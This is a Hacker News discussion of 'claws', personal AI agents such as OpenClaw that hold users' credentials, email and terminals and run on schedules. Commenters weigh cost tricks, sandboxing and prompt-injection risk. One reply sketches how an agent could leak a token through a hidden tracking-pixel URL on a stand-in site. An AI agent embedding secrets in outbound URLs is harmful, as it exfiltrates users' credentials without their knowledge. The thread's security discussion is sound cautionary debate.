Comment by ZeroGravitas
3 days ago
So what is a "claw" exactly?
An ai that you let loose on your email etc?
And we run it in a container and use a local llm for "safety" but it has access to all our data and the web?
3 days ago
So what is a "claw" exactly?
An ai that you let loose on your email etc?
And we run it in a container and use a local llm for "safety" but it has access to all our data and the web?
It's a new, dangerous and wildly popular shape of what I've in the past called a "personal digital assistant" - usually while writing about how hard it is to secure them from prompt injection attacks.
The term is in the process of being defined right now, but I think the key characteristics may be:
- Used by an individual. People have their own Claw (or Claws).
- Has access to a terminal that lets it write code and run tools.
- Can be prompted via various chat app integrations.
- Ability to run things on a schedule (it can edit its own frontal equivalent)
- Probably has access to the user's private data from various sources - calendars, email, files etc. very lethal trifecta.
Claws often run directly on consumer hardware, but that's not a requirement - you can host them on a VPS or pay someone to host them for you too (a brand new market.)
Any suggestions for a specific claw to run? I tried OpenClaw in Docker (with the help of your blog post, thanks) but found it way too wasteful on tokens/expensive. Apparently there's a ton of tweaks to reduce spent by doing things like offloading heartbeat to a local Ollama model, but was looking for something more... put together/already thought through.
The pattern I found that works ,use a small local model (llama 3b via Ollama, takes only about 2GB) for heartbeat checks — it just needs to answer 'is there anything urgent?' which is a yes/no classification task, not a frontier reasoning task. Reserve the expensive model for actual work. Done right, it can cut token spend by maybe 75% in practice without meaningfully degrading the heartbeat quality. The tricky part is the routing logic — deciding which calls go to the cheap model and which actually need the real one. It can be a doozy — I've done this with three lobsters, let me know if you have any questions.
5 replies →
> but found it way too wasteful on tokens/expensive
I fear this is intrinsic to its architecture. Even if you use smaller models for regular operational tasks (checking heartbeat), you'll inevitably need to promote back to bigger models to do anything useful, and the whole idea of openclaw is that it can do many useful things for you, autonomously. I think that means it's going to burn a lot of tokens if you're using it as intended.
This is presumably also why the default model mode is to try and oauth its way into coding agent harnesses instead of using lab API's?
Last night, I was able to modify nanoclaw, which runs in a container, to use iMessage(instead of whatsapp ) and use GPT-OSS-120B(instead of Claude) hosted on a Nvidia spark running llama.cpp.
It works but a bit slow when asking for web based info. Took a couple of minutes to return a stock price closing value. Trying it again this morning returned an answer in a couple of seconds so perhaps that was just a network blip.
It did get confused when scheduling times as the UTC date time was past midnight but my local EST time was before midnight. This caused my test case case of “tomorrow morning at 7am send me the current Olympic county medal count” test to be scheduled a day later. I told it to assume EST timezone and it appeared to work when translating times but not dates.
Based off the gp's comment, I'm going to try building my own with pocket flow and ollama.
I like ADK, it's lower level and more general, so there is a bit you have to do to get a "claw" like experience (not that much) and you get (1) a common framework you can use for other things (2) a lot more places to plug in (3) four SDKs to choose from (ts, go, py, java... so far)
It's a lot more work to build a Copilot alternative (ide integration, cli). I've done a lot of that with adk-go, https://github.com/hofstadter-io/hof
Just use Google flash for heartbeats
[dead]
I spent a few days running openclaw on a VPS, and it was painful and frustrating:
- no graphics subsystem makes things harder
- VPS IP subnets are often blocked by default by numerous websites and WAFs
- can't easily see what it's doing
Running it on its own PC is definitely the golden path for the way it's architected.
> Running it on its own PC is definitely the golden path for the way it's architected.
Not really familiar with the architecture, but would it be possible to run it on a not so powerful laptop in a "client" mode, where it would query a LLM that is running on a more beefy desktop?
I think for me it is an agent that runs on some schedule, checks some sort of inbox (or not) and does things based on that. Optionally it has all of your credentials for email, PayPal, whatever so that it can do things on your behalf.
Basically cron-for-agents.
Before we had to go prompt an agent to do something right now but this allows them to be async, with more of a YOLO-outlook on permissions to use your creds, and a more permissive SI.
Not rocket science, but interesting.
Cron would be for a polling model. You can also have an interrupts/events model that triggers it on incoming information (eg. new email, WhatsApp, incoming bank payments etc).
I still don't see a way this wouldn't end up with my bank balance being sent to somewhere I didn't want.
Don't give it write permissions?
You could easily make human approval workflows for this stuff, where humans need to take any interesting action at the recommendation of the bot.
10 replies →
> I still don't see a way
1) don't give it access to your bank
2) if you do give it access don't give it direct access (have direct access blocked off and indirect access 2FA to something physical you control and the bot does not have access to)
---
agreed or not?
---
think of it like this -- if you gave a human power to drain you bank balance but put in no provision to stop them doing just that would that personal advisor of yours be to blame or you?
2 replies →
I'd like to deploy it to trawl various communities that I frequent for interesting information and synthesize it for me... basically automate the goofing off that I do by reading about music gear. This way I stay apprised of the broader market and get the lowdown on new stuff without wading through pages of chaff. Financial market and tech news are also good candidates.
Of course this would be in a read-only fashion and it'd send summary messages via Signal or something. Not about to have this thing buy stuff or send messages for me.
Could save a lot of time.
Over the long run, I imagine it summarizing lots of spam/slop in a way that obscures its spamminess[1]. Though what do I think, that I’ll still see red flags in text a few years from now if I stick to source material?
[1] Spent ten minutes on Nitter last week and the replies to OpenClaw threads consisted mostly of short, two sentence, lowercase summary reply tweets prepended with banal observations (‘whoa, …’). If you post that sliced bread was invented they’d fawn “it used to be you had to cut the bread yourself, but this? Game chan…”
I think this is absolute madness. I disabled most of Windows' scheduled tasks because I don't want automation messing up my system, and now I'm supposed to let LLM agents go wild on my data?
That's just insane. Insanity.
Edit: I mean, it's hard to believe that people who consider themselves as being tech savvy (as I assume most HN users do, I mean it's "Hacker" news) are fine with that sort of thing. What is a personal computer? A machine that someone else administers and that you just log in to look at what they did? What's happening to computer nerds?
Bath salts. Ever seen an alpha-PVP user with eyes out of their orbits, sitting through the night in front of basically a random string generator, sending you snippets of its output and firehosing with monologues about how they're right at the verge of discovering an epically groundbreaking correlation in it?
That is what's happening to nerds right now. Some next-level mind-boggling psychosis-inducing shit has to do with it.
Either this or a completely different substance: AI propaganda.
1 reply →
I find it's the same kind of "tech savvy" person who puts an amazon echo in every room.
1 reply →
Whats it got to do with being a nerd? Just a matter of risk aversity.
Personally I dont give a shit and its cool having this thing setup at home and being able to have it run whatever I want through text messages.
And it's not that hard to just run it in docker if you're so worried
1 reply →
The computer nerds understand how to isolate this stuff to mitigate the risk. I’m not in on openclaw just yet but I do know it’s got isolation options to run in a vm. I’m curious to see how they handle controls on “write” operations to everyday life.
I could see something like having a very isolated process that can, for example, send email, which the claw can invoke, but the isolated process has sanity controls such as human intervention or whitelists. And this isolated process could be LLM-driven also (so it could make more sophisticated decisions about “is this ok”) but never exposed to untrusted input.
2 replies →
The idea that the majority of computer nerds are any more security conscious than the average normy has long been dispelled.
The run everything as root, they curl scripts, they npx typos, they give random internet apps "permission to act on your behalf" on repos millions of people depend on
> and now I'm supposed to let LLM agents go wild on my data?
Who is forcing you to do that?
The people you are amazed by know their own minds and understand the risks.
1 reply →
> That's just insane. Insanity.
I feel the same way! Just watching on in horror lol
Definitely interesting but i mean giving it all my credentials feels not right. Is there a safe way to do so?
In a VM or a separate host with access to specific credentials in a very limited purpose.
In any case, the data that will be provided to the agent must be considered compromised and/or having been leaked.
My 2 cents.
21 replies →
Ideally workflow would be some kind of Oauth with token expirations and some kind of mobile notification for refresh
That's it basically. I do not think running the tool in a container really solves the fundamental danger these tools pose to your personal data.
You could run them in a container and put access to highly sensitive personal data behind a "function" that requires a human-in-the-loop for every subsequent interaction. E.g. the access might happen in a "subagent" whose context gets wiped out afterwards, except for a sanitized response that the human can verify.
There might be similar safeguards for posting to external services, which might require direct confirmation or be performed by fresh subagents with sanitized, human-checked prompts and contexts.
So you give it approval to the secret once, how can you be sure it wasn’t sent someplace else / persisted somehow for future sessions?
Say you gave it access to Gmail for the sole purpose of emailing your mom. Are you sure the email it sent didn’t contain a hidden pixel from totally-harmless-site.com/your-token-here.gif?
3 replies →
I am creating a claw that is basically a loop that runs every x minutes. It uses the Claude cli tool. And it builds a memory based on some kind of simple node system. With active memories and fading old memories. I also added functionality to add integrations like whatsapp, agenda. Slack and gmail. so every "loop" the ai reads in information and updates it's memory. There is also a directive that can decide to create tasks or directly message me or others. It's a bit of playing around. Very dangerous, but fun to play with. The application even has self improvement system. I creates a few pull requests every day it thinks is needed to make it better. Hugely fun to see it evolving. https://github.com/holoduke/myagent
it's a psychological state that happens when someone is so desperate to seem cool and up with the latest AI hype that they decide to recklessly endanger themselves and others.
I read all 500+ comments at the time of writing and I don't understand. Something about something, with people saying something isn't a claw.
to claw or not to claw, that is the question
There are a few qualitative product experiences that make claw agents unique.
One is that it relentlessly strives thoroughly to complete tasks without asking you to micromanage it.
The second is that it has personality.
The third is that it's artfully constructed so that it feels like it has infinite context.
The above may sound purely circumstantial and frivolous. But together it's the first agent that many people who usually avoid AI simply LOVE.
> it's the first agent that many people who usually avoid AI simply LOVE.
Not arguing with your other points, but I can't imagine "people who usually avoid AI" going through the motions to host OpenClaw.
It's classic hype/FOMO posturing.
My work partner set it up on telegram for himself and his wife and she uses it constantly. He was very surprised.
1 reply →
Claws read from markdown files for context, which feels nothing like infinite. That's like saying McDonalds makes high quality hamburgers.
The "relentlessness" is just a cron heartbeat to wake it up and tell it to check on things it's been working on. That forced activity leads to a lot of pointless churn. A lot of people turn the heartbeat off or way down because it's so janky.
Are you a sales bot?
Can you give some example for what you use it for? I understand giving a summary of what's waiting in your inbox but what else?
Extending your driver's license.
Asking the bank for a second mortgage.
Finding the right high school for your kids.
The possibilities are endless.
/s <- okay
7 replies →
I use it for stuff like this from my phone:
- Setup mailcow, anslytics, etc on my server.
- Run video generation model on my linux box for variations of this prompt
- At the end of every day analyze our chats, see common pain points and suggest tools that would help.
- Monitor my API traffic over night and give me a report in the morning of errors.
Im convinced this is going to be the future
I actually seriously want to hear about good use cases. So far I haven't found anything: either I don't trust the agent with the access because too many things can go wrong, or the process is too tailored to humans and I don't trust it to be able to habdle it.
For example, finding an available plumber. Currently involves Googling and then calling them one by one. Usually takes 15-20 calls before I can find one that has availability.
I asked mine to give me some motivational pep at 9am monday.
Now that could evolve and turn into a personal trainer keeping track of my progress.
What if I send it my heart rate. Etc. Prove I did it.
A claw is an orchestrator for agents with its own memory, multiprocessing, job queue and access to instant messengers.
From a technical perspective, if agents are "an LLM and tools in a loop", I'd define claws as "agents in a queue". Or in other words claws are "an LLM and tools in a loop, in a queue"
Also is Claw named because of Claude. I.e. Claude -> Clawd -> Claw
The next hyped bullshit de jure spewing out of the ass of the AI bros, cause the hype cycle on agents is starting to die down. Can't have 30 billion dollar circular deals while setting aflame barrels of cash without the hype machine churning through the Next Thing!
It's 'de jour' , which means 'of the day' in French
It's anything that's like OpenClaw, but not necessarily open.